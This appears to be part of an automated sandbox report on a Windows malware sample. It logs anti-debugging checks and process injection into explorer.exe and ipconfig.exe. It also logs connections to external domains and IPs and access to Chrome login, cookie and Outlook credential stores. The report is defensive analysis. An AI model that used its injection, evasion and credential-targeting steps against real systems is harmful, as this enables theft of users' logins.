          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AEEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AB4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A31B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A31B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ADD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A52397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4EB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4EB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AD23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AD23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AD23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A53B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A53B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ABC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AD8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AEE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AAA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A63D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AD3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A47D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ABFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A68EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ADFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ADFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A58E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AEAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A38794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A637F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A24F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ABFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0040C3E7 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040AB3E SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040A9DF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040AE0C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040F730 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeDomain query: www.fedefarmatour.online
          Source: C:\Windows\explorer.exeDomain query: www.a8-group.com
          Source: C:\Windows\explorer.exeNetwork Connect: 50.87.143.200 80
          Source: C:\Windows\explorer.exeDomain query: www.t4yfrance.com
          Source: C:\Windows\explorer.exeDomain query: www.inhomeyoga.com
          Source: C:\Windows\explorer.exeNetwork Connect: 195.110.124.133 80
          Source: C:\Windows\explorer.exeNetwork Connect: 194.58.112.174 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.88.48.71 80
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 210000
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\iscan.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeThread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeThread register set: target process: 3452
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeThread register set: target process: 3452
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 3452
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeProcess created: C:\Users\user\AppData\Local\Temp\iscan.exe "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c
          Source: explorer.exe, 00000004.00000000.302343786.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.329189526.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.257527042.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
          Source: explorer.exe, 00000004.00000000.302343786.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.329189526.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.311230445.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.302343786.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.329189526.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.257527042.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.328795105.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.301814210.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.257028572.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
          Source: explorer.exe, 00000004.00000000.302343786.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.329189526.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.257527042.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040AC4B cpuid
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040A8C8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\ipconfig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
